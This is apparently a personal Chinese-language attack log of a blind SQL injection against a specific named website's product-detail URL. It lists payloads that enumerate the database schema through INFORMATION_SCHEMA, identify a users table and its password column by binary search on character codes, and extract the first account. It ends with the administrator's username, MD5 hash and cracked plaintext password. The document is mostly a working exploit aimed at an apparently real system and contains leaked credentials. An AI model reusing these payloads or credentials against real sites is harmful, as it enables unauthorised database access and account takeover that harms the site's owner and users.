sql inject

技术

• http://www.scxwx.com/product/detail?id=3

```sql
%20and exists (SELECT 1 FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and table_name like '%users%') -- user表包含users
%20and (SELECT count(*) FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and table_name like '%users%')=1 -- 包含users的表只有一个
-- 用二分法在1~127中查找所属的字符，查出为122即z，用同样方法一直找，直到>0也没时，就到底了。
%20and exists (SELECT 1 FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and table_name like '%users%' and ascii(substr(table_name,1,1)) > 90)
-- 重复上一步，将substr(table_name,1,1)改为substr(table_name,2,1)，依此类推，可得到user表名为 zishu_users

%20and exists (select 1 from information_schema.COLUMNS where table_schema=database() and table_name='zishu_users' and column_name='username') -- 有username字段
%20and exists (select 1 from information_schema.COLUMNS where table_schema=database() and table_name='zishu_users' and column_name like '%password%') -- 有%password%字段
%20and exists (select 1 from information_schema.COLUMNS where table_schema=database() and table_name='zishu_users' and column_name like '%password%' and ascii(substr(column_name,1,1)) > 90) -- 用二分法找，可以知道字段名为 userpassword
%20and ascii(substring((SELECT concat(username,0x3a,userpassword) from zishu_users limit 0,1),1,1))>90 -- 用二分法查找user表的第一行记录的用户名和密码
-- 得出是 administrator:5a3f3486f014252b17c3b6b97fdcf482，去解密md5，得出 082188